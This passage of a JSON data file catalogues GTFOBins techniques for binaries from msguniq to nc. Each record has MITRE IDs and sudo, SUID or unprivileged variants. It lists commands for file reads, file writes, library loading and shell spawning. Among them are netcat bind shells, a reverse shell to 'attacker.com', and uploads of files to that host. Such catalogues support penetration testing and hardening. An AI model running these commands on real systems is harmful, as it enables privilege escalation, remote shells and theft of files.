/path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msguniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mtr:file-read:0:sudo","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mtr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mtr:file-read:0:unprivileged","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mtr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:multitime:shell:0:sudo","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/multitime/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:multitime:shell:0:suid","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/multitime/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:multitime:shell:0:unprivileged","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/multitime/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mutt:file-read:0:sudo","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mutt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mutt:file-read:0:unprivileged","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mutt/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:file-write:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:file-write:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:file-write:0:unprivileged","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:privilege-escalation:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mv:privilege-escalation:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-read:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-read:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-write:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mypy:file-write:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:library-load:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:library-load:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:library-load:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:shell:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:shell:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mysql:shell:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nano:file-read:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-read:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-read:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-write:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-write:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:file-write:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:1:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:1:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano -s '/bin/sh -p'\n/bin/sh -p\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nano:shell:1:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano -s /bin/sh\n/bin/sh\n^T^T","description":"The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["pico"]},{"id":"gtfo:nasm:file-read:0:sudo","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nasm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nasm:file-read:0:suid","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nasm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nasm:file-read:0:unprivileged","toolId":"gtfo:nasm","toolName":"nasm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nasm -@ /path/to/input-file","description":"The file content is treated as command line options and disclosed throught error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nasm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:bind-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:bind-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:bind-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"nc -l -p 12345 -e /bin/sh","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc -l -p 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:1:suid","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:download:1:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"nc attacker.com 12345 >/path/to/output-file","description":"The file is actually written by the invoking shell.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:reverse-shell:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:reverse-shell:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:reverse-shell:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"nc -e /bin/sh attacker.com 12345","description":"This only works with netcat traditional.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:0:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:0:suid","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:0:unprivileged","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"nc -l -p 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nc:upload:1:sudo","toolId":"gtfo:nc","toolName":"nc","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"nc attacker.com 12345 </path/to/input-file","description":"The file is actually read by the invoking shell.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 